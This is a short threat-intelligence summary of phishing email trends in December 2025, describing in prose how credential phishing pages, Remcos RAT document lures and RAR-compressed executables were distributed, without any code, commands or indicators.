December 2025 Phishing Email Trends Report
This report provides the distribution quantity, statistics, trends, and case information on phishing emails, which were collected and analyzed for one month in December 2025. The following statistics and cases are included in the original report.
1) Statistics of phishing email threats
In December 2025, the most common type of threat among phishing emails was phishing (91%). Threat actors used scripts such as HTML to mimic the screen layout, logo, and font of login pages and advertising pages. Users were prompted to enter their account credentials, which were then sent to the threat actor’s C2 server or used to lure users to fake websites. This type of phishing also involves inserting hyperlinks into documents such as PDFs to direct users to phishing websites created by threat actors.
Figure 1. Phishing email threat statistics
It also reflects the recent trends of threats posed by phishing emails by providing data on the distribution of samples by category over the past six months. Additionally, statistics on the extension of attachments found in phishing emails are provided, allowing users to gain an understanding of the file formats used in phishing emails. Readers can refer to the original ATIP report for other statistics not covered in this summary.
2) Distribution of Korean-language emails
This section categorizes cases that consist of Korean text and partially discloses the subject and attachment file names of each sample. This information allows readers to identify the keyword information that frequently appears in phishing email threats.
Figure 2. Part of the list of phishing emails distributed in Korean
3) Analysis of Phishing Email Distribution Cases
Representative cases were analyzed according to the format of the attachments (Script, Document, Compress). Through this, it is possible to identify the phishing email attack cases that actually occurred this month. This month, not only were phishing pages (FakePage) attached in Script format, but Remcos RAT malware was also distributed via phishing emails using Document attachments. When the document file is executed, a hyperlink that downloads additional malware (C2) is present internally. When the downloaded malware is executed, Remcos RAT is run. In addition, there has been a recent increase in cases where an EXE file is compressed in a RAR and distributed via a phishing email. Additional information, including the C2 address and analysis information, and the body of the phishing email that distributed the malware, can be found in the original ATIP report and ATIP Notes.
Figure 3. Malware distributed as an attachment in Document format
Figure 4. Malware distributed as an attachment in Compress format
This post has disclosed a part of the December 2025 Phishing Email Trend Report. The original ATIP report contains additional information, such as the recent distribution trends of phishing (FakePage) and malware, statistics on the distribution by attachment file extension, and analysis of actual phishing email attacks.
